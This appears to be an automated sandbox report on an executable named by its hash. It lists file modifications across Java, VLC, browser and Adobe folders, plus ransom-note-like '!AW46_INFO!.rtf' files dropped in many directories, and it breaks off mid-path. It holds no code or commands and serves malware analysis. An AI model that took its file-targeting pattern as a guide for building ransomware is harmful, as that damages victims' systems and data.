7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-attach_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Karachi 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\bin\ktab.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\fi.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\feature.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\flavormap.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-output2_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\MANIFEST.MF 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\tools.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Copenhagen 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\release 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\AST4 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\vlm_export.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-11 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\YST9YDT 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-14 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Uzhgorod 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-javahelp_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateHelper.msi 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ashgabat 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-1 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\sandbox.luac 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Windows Journal\Templates\Genko_2.jtp 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.security_8.1.14.v20131031.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Makassar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Mozilla Firefox\defaults\pref\channel-prefs.js 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\luac.luac 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Mazatlan 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.w3c.dom.events_3.0.0.draft20060413_v201105210656.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\appletviewer.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Godthab 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME.txt 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Andorra 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-io-ui_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.event_1.3.100.v20140115-1647.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.lucene.analysis_3.5.0.v20120725-1805.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\rmid.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.directorywatcher.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.runtime_3.10.0.v20140318-2214.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javadoc.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\flavormap.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santo_Domingo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\imap.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\jamendo.luac 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\EST5EDT 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBlue.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-services_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Back-48.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\nl.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.inject_1.0.0.v20091030.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\profile.jfc 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-uisupport_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setNetworkClientCP.bat 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\title.htm 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Mozilla Firefox\firefox.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-awt.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Tahiti 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\asl-v20.txt 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\boot.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\keytool.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\visualvm.conf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Minsk 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaSansDemiBold.ttf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\equalizer_window.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvm_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.w3c.css.sac_1.3.1.v200903091627.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\currency.data 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jinfo.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings_0.10.200.v20140424-2042.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Accra 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Urumqi 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkHandle.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Bucharest 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.services.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\orbd.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kamchatka 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-settings_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Tegucigalpa 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser.ja_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\MST7 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-selector-api.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaBrightRegular.ttf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.felix.gogo.command_0.10.0.v201209301215.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Nipigon 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Tripoli 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sendopts_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Google\Update\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\US_export_policy.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Kiev 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\amd64\jvm.cfg 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Wake 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.directorywatcher_1.1.0.v20131211-1531.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\lua\modules\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\ru.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\clearkey.dll.sig 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\WidevineCdm\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Sitka 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Kerguelen 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\security\java.policy 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\psfontj2d.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Montevideo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Blanc-Sablon 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management-agent.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Qyzylorda 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-spi-actions.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\amd64\jvm.cfg 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\jquery-ui-1.8.13.custom.css 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Tarawa 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Omsk 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\PDDom.api 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\javaw.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\db\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3_0.12.0.v20140227-2118.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-6 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.win32.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\NetworkServerControl 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\LINEAR_RGB.pf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Khartoum 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director_2.3.100.v20140224-1921.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\lt\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\about.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-coredump.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Fiji 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jvmti.h 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui_2.3.0.v20140404-1657.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\epl-v10.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program 